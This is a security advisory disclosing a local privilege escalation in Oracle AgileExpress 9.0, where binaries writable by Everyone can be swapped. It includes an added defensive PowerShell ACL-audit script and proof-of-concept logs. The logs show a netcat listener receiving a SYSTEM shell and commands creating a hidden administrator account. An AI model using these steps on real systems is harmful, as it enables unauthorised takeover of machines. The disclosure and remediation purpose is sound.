Document Title:
===============
Oracle AgileExpress v9.0 - Privilege Escalation Vulnerability

Date:
=====
2018-01-16

References:
===========
https://www.vulnerability-lab.com/get_content.php?id=2114

VL-ID:
=====
2114

Common Vulnerability Scoring System:
====================================
4.2

Vulnerability Class:
====================
Privilege Escalation

Introduction:
=============
Agile eXpress allows Agile users to create a PDX package containing product definition data and publish it to their partners.
Interested parties can then view the data using Agile eXpress even if they don't have access to the Agile server. The Agile
Web Client allows you to import product data created on another system or another Agile system into your Agile system. Using
Agile eXpress and the Agile Web Client, customers and partners can exchange all product information required to build a new
product or change an existing product.

(Copy of the Homepage: http://agile-express.software.informer.com/ )

Abstract:
=========
The vulnerability laboratory core research team discovered a local privilege escalation vulnerability in the Oracle AgileExpress 9.0 software.

Report-Timeline:
================
2017-11-02: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-11-03: Vendor Notification (Oracle Security Alerts)
2017-11-29: Vendor Response/Feedback (Oracle Security Alerts)
2017-12-04: Vendor Response/Feedback (Oracle Security Alerts - Removal of Software)
2017-12-04: Vendor Response/Feedback (Security Acknowledgement) (Oracle Security Alerts - Security-In-Depth Contributors)
2018-01-16: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================

Exploitation-Technique:
=======================
Local

Severity:
=========
Medium

Details:
========
A local privilege escalation vulnerability has been discovered in the official Oracle AgileExpress 9.0 software.
The local security vulnerability allows an attacker to gain higher access privileges by exploiting a weak file permission
misconfiguration in the software installation. The installed executables carry the `F` (full control) permission for the
`Everyone` group, i.e. the permission on the path is assigned to every user of the machine, so any local user is able to
replace the files with a binary of choice. A local attacker could exploit the vulnerability by replacing one of these files
with a malicious executable; because of the misconfiguration, the malicious file is executable with the local system user
permissions. The security risk of the vulnerability is estimated as medium. Exploitation of the software vulnerability
requires a low-privileged system user account with restricted access and no user interaction. Successful exploitation of
the vulnerability results in system process compromise and further manipulation or exploitation to compromise the local
computer operating system.

Proof of Concept:
=================
The local privilege escalation vulnerability can be exploited by local attackers without user interaction and with a system
user account. For security demonstration or to reproduce the security vulnerability, follow the provided information and
steps below.
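The following PowerShell script is an added defensive example and is not part of the original advisory or of the Oracle product. It audits an installation tree for the exact weakness shown in the session logs below (binaries that grant FullControl or any other write-capable right to `Everyone`, `BUILTIN\Users`, `Authenticated Users` or `INTERACTIVE`) and, with `-Fix`, replaces those ACEs with ReadAndExecute so the programs stay usable but can no longer be overwritten by an unprivileged user. The default `$Root` path, the function names and the list of low-privilege principals are assumptions chosen for the example.

```powershell
<#
  Added audit/remediation example (not from the advisory).
  Finds .exe/.dll files under $Root whose DACL gives write-capable rights to
  principals every local user belongs to, and optionally repairs them.
  $Root is an assumed install location; pass the real directory.
  Run elevated when using -Fix; use -WhatIf to preview the changes.
#>
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [string]$Root = 'C:\Program Files (x86)\Agile eXpress',   # assumed path
    [switch]$Fix
)

# Principals that cover every local user; none of them should be able to write binaries.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any single one of these rights lets the holder replace, append to, delete or re-ACL a file.
$fsr = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $fsr::FullControl -bor $fsr::Modify -bor $fsr::Write -bor
               $fsr::WriteData -bor $fsr::AppendData -bor $fsr::Delete -bor
               $fsr::ChangePermissions -bor $fsr::TakeOwnership

function Get-WeakBinaryAcl {
    # Emits one record per (file, offending ACE); the Inherited flag mirrors icacls' (I).
    param([string]$Path)
    Get-ChildItem -Path $Path -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $acl  = Get-Acl -LiteralPath $file.FullName
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                if (($ace.FileSystemRights -band $WriteRights) -eq 0) { continue }
                [pscustomobject]@{
                    Path      = $file.FullName
                    Owner     = $acl.Owner
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
}

function Repair-WeakBinaryAcl {
    # Drops every ACE of the offending principal on the file and re-grants ReadAndExecute only.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(ValueFromPipeline = $true)]$Finding)
    process {
        $action = "Replace $($Finding.Principal) write access with ReadAndExecute"
        if (-not $PSCmdlet.ShouldProcess($Finding.Path, $action)) { return }
        $acl = Get-Acl -LiteralPath $Finding.Path
        if ($Finding.Inherited) {
            # Inherited ACEs cannot be removed in place: break inheritance while keeping
            # copies of the inherited entries as explicit ones, then re-read the ACL.
            $acl.SetAccessRuleProtection($true, $true)
            Set-Acl -LiteralPath $Finding.Path -AclObject $acl
            $acl = Get-Acl -LiteralPath $Finding.Path
        }
        $id = New-Object System.Security.Principal.NTAccount($Finding.Principal)
        $acl.PurgeAccessRules($id)
        $rx = New-Object System.Security.AccessControl.FileSystemAccessRule($id, 'ReadAndExecute', 'Allow')
        $acl.AddAccessRule($rx)
        Set-Acl -LiteralPath $Finding.Path -AclObject $acl
    }
}

$findings = @(Get-WeakBinaryAcl -Path $Root)
if ($findings.Count -eq 0) {
    Write-Host "No binaries writable by low-privilege principals under $Root"
} else {
    $findings | Format-Table Path, Principal, Rights, Inherited -AutoSize
    if ($Fix) { $findings | Repair-WeakBinaryAcl }
}
```

The `(I)` flag in the icacls output below means the `Everyone:(F)` entry is inherited from the installation directory, so after repairing the files the directory DACL itself should be corrected as well (otherwise any file the installer or an update writes later inherits the same weak ACE). Running the audit without `-Fix` is a safe read-only check that can be scheduled against every software installation directory, not only this product.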
--- Session Logs (PRIVILEGES) ---
Medium Mandatory Level (Default) [No-Write-Up]

RW Everyone                  FILE_ALL_ACCESS   <-----------------------------
RW BUILTIN\Administrators    READ_CONTROL WRITE_DAC

Owner  : BUILTIN\Administrators
Group  : MACHINE-PC\None
Access : Everyone Allow FullControl   <-----------------------------
Sddl   : O:BAG:S-1-5-21-3389066293-2711879841-802680780-513D:AI(A;OICIID;FA;WD)


--- Session Logs (AGILEEXPRESS / PERMISSIONS) ---
[+] AgileExpress.exe ======> Everyone:(I)(F)

Path              Owner                   Access
----              -----                   ------
AgileExpress.exe  BUILTIN\Administrators  Everyone Allow FullControl


--- Session Logs (UNINSTALL / PERMISSIONS) ---
[+] Uninstall Agile eXpress.exe ======> Everyone:(I)(F)


--- Session Logs (RESOURCE / PERMISSIONS) ---
[+] remove.exe ======> Everyone:(I)(F)
[+] ZGWin32LaunchHelper.exe ======> Everyone:(I)(F)


--- Session Logs (JREBIN / PERMISSIONS) ---
[+] appletviewer.exe ======> Everyone:(I)(F)
[+] apt.exe ======> Everyone:(I)(F)
[+] extcheck.exe ======> Everyone:(I)(F)
[+] idlj.exe ======> Everyone:(I)(F)
[+] jabswitch.exe ======> Everyone:(I)(F)
[+] jar.exe ======> Everyone:(I)(F)
[+] jarsigner.exe ======> Everyone:(I)(F)
[+] java-rmi.exe ======> Everyone:(I)(F)
[+] java.exe ======> Everyone:(I)(F)
[+] javac.exe ======> Everyone:(I)(F)
[+] javadoc.exe ======> Everyone:(I)(F)
[+] javafxpackager.exe ======> Everyone:(I)(F)
[+] javah.exe ======> Everyone:(I)(F)
[+] javap.exe ======> Everyone:(I)(F)
[+] javaw.exe ======> Everyone:(I)(F)
[+] javaws.exe ======> Everyone:(I)(F)
[+] jcmd.exe ======> Everyone:(I)(F)
[+] jconsole.exe ======> Everyone:(I)(F)
[+] jdb.exe ======> Everyone:(I)(F)
[+] jhat.exe ======> Everyone:(I)(F)
[+] jinfo.exe ======> Everyone:(I)(F)
[+] jmap.exe ======> Everyone:(I)(F)
[+] jps.exe ======> Everyone:(I)(F)
[+] jrunscript.exe ======> Everyone:(I)(F)
[+] jsadebugd.exe ======> Everyone:(I)(F)
[+] jstack.exe ======> Everyone:(I)(F)
[+] jstat.exe ======> Everyone:(I)(F)
[+] jstatd.exe ======> Everyone:(I)(F)
[+] jvisualvm.exe ======> Everyone:(I)(F)
[+] keytool.exe ======> Everyone:(I)(F)
[+] kinit.exe ======> Everyone:(I)(F)
[+] klist.exe ======> Everyone:(I)(F)
[+] ktab.exe ======> Everyone:(I)(F)
[+] native2ascii.exe ======> Everyone:(I)(F)
[+] orbd.exe ======> Everyone:(I)(F)
[+] pack200.exe ======> Everyone:(I)(F)
[+] packager.exe ======> Everyone:(I)(F)
[+] policytool.exe ======> Everyone:(I)(F)
[+] rmic.exe ======> Everyone:(I)(F)
[+] rmid.exe ======> Everyone:(I)(F)
[+] rmiregistry.exe ======> Everyone:(I)(F)
[+] schemagen.exe ======> Everyone:(I)(F)
[+] serialver.exe ======> Everyone:(I)(F)
[+] servertool.exe ======> Everyone:(I)(F)
[+] tnameserv.exe ======> Everyone:(I)(F)
[+] unpack200.exe ======> Everyone:(I)(F)
[+] wsgen.exe ======> Everyone:(I)(F)
[+] wsimport.exe ======> Everyone:(I)(F)
[+] xjc.exe ======> Everyone:(I)(F)

Path                Owner                   Access
----                -----                   ------
appletviewer.exe    BUILTIN\Administrators  Everyone Allow FullControl
apt.exe             BUILTIN\Administrators  Everyone Allow FullControl
extcheck.exe        BUILTIN\Administrators  Everyone Allow FullControl
idlj.exe            BUILTIN\Administrators  Everyone Allow FullControl
jabswitch.exe       BUILTIN\Administrators  Everyone Allow FullControl
jar.exe             BUILTIN\Administrators  Everyone Allow FullControl
jarsigner.exe       BUILTIN\Administrators  Everyone Allow FullControl
java-rmi.exe        BUILTIN\Administrators  Everyone Allow FullControl
java.exe            BUILTIN\Administrators  Everyone Allow FullControl
javac.exe           BUILTIN\Administrators  Everyone Allow FullControl
javadoc.exe         BUILTIN\Administrators  Everyone Allow FullControl
javafxpackager.exe  BUILTIN\Administrators  Everyone Allow FullControl
javah.exe           BUILTIN\Administrators  Everyone Allow FullControl
javap.exe           BUILTIN\Administrators  Everyone Allow FullControl
javaw.exe           BUILTIN\Administrators  Everyone Allow FullControl
javaws.exe          BUILTIN\Administrators  Everyone Allow FullControl
jcmd.exe            BUILTIN\Administrators  Everyone Allow FullControl
jconsole.exe        BUILTIN\Administrators  Everyone Allow FullControl
jdb.exe             BUILTIN\Administrators  Everyone Allow FullControl
jhat.exe            BUILTIN\Administrators  Everyone Allow FullControl
jinfo.exe           BUILTIN\Administrators  Everyone Allow FullControl
jmap.exe            BUILTIN\Administrators  Everyone Allow FullControl
jps.exe             BUILTIN\Administrators  Everyone Allow FullControl
jrunscript.exe      BUILTIN\Administrators  Everyone Allow FullControl
jsadebugd.exe       BUILTIN\Administrators  Everyone Allow FullControl
jstack.exe          BUILTIN\Administrators  Everyone Allow FullControl
jstat.exe           BUILTIN\Administrators  Everyone Allow FullControl
jstatd.exe          BUILTIN\Administrators  Everyone Allow FullControl
jvisualvm.exe       BUILTIN\Administrators  Everyone Allow FullControl
keytool.exe         BUILTIN\Administrators  Everyone Allow FullControl
kinit.exe           BUILTIN\Administrators  Everyone Allow FullControl
klist.exe           BUILTIN\Administrators  Everyone Allow FullControl
ktab.exe            BUILTIN\Administrators  Everyone Allow FullControl
native2ascii.exe    BUILTIN\Administrators  Everyone Allow FullControl
orbd.exe            BUILTIN\Administrators  Everyone Allow FullControl
pack200.exe         BUILTIN\Administrators  Everyone Allow FullControl
packager.exe        BUILTIN\Administrators  Everyone Allow FullControl
policytool.exe      BUILTIN\Administrators  Everyone Allow FullControl
rmic.exe            BUILTIN\Administrators  Everyone Allow FullControl
rmid.exe            BUILTIN\Administrators  Everyone Allow FullControl
rmiregistry.exe     BUILTIN\Administrators  Everyone Allow FullControl
schemagen.exe       BUILTIN\Administrators  Everyone Allow FullControl
serialver.exe       BUILTIN\Administrators  Everyone Allow FullControl
servertool.exe      BUILTIN\Administrators  Everyone Allow FullControl
tnameserv.exe       BUILTIN\Administrators  Everyone Allow FullControl
unpack200.exe       BUILTIN\Administrators  Everyone Allow FullControl
wsgen.exe           BUILTIN\Administrators  Everyone Allow FullControl
wsimport.exe        BUILTIN\Administrators  Everyone Allow FullControl
xjc.exe             BUILTIN\Administrators  Everyone Allow FullControl


--------- ( NET USER SAIF ) ---------
User name                    saif
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.


--------- ( NET LOCALGROUP ADMINISTRATORS ) ---------
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
dell                  < ------------
The command completed successfully.


- WHOAMI ====> MACHINE-PC\saif

c:\Users\Saif\Desktop\Nc\nc.exe -lvp 4433
Listening on [any] 4433 ...
Connect to [ 192.168............ ] from [ 192.168............ ] 49500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\System32>whoami
whoami
NT AUTHORITY\SYSTEM   < ------------

C:\Windows\System32>net user /add test test
The command completed successfully.

C:\Windows\System32>net localgroup administrators /add test test
The command completed successfully.

C:\Windows\System32>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
dell
test                  < ------------
The command completed successfully.


--------- ( NET USER TEST ) ---------
User name                    test
Full Name
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships      *Administrators      *Users
Global Group memberships     *None
The command completed successfully.
- NOTE: A simple user can manage other [Administrators / Users] accounts:
[+] Change account names
[+] Change passwords
[+] Remove passwords
[+] Set up parental controls
[+] Change account types
[+] Delete accounts


Solution:
=========
Oracle inadvertently listed this software on Oracle Technology Network and has removed the software and documentation from its download site:

Link : http://www.oracle.com/technetwork/apps-tech/index-097651.html
Link : http://www.oracle.com/technetwork/agileexpress-license-152008.html


Risk:
=====
The security risk of the local privilege escalation vulnerability in the Oracle AgileExpress v9.0 software is estimated as medium (cvss 4.2).


Credits:
========
S.AbenMassaoud [saifmassaoudi18@gmail.com] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with
stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of
religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone
numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains:    www.vulnerability-lab.com       - www.vulnerability-db.com                      - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab            - facebook.com/VulnerabilityLab                 - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from
Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights,
including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories,
source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or
managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™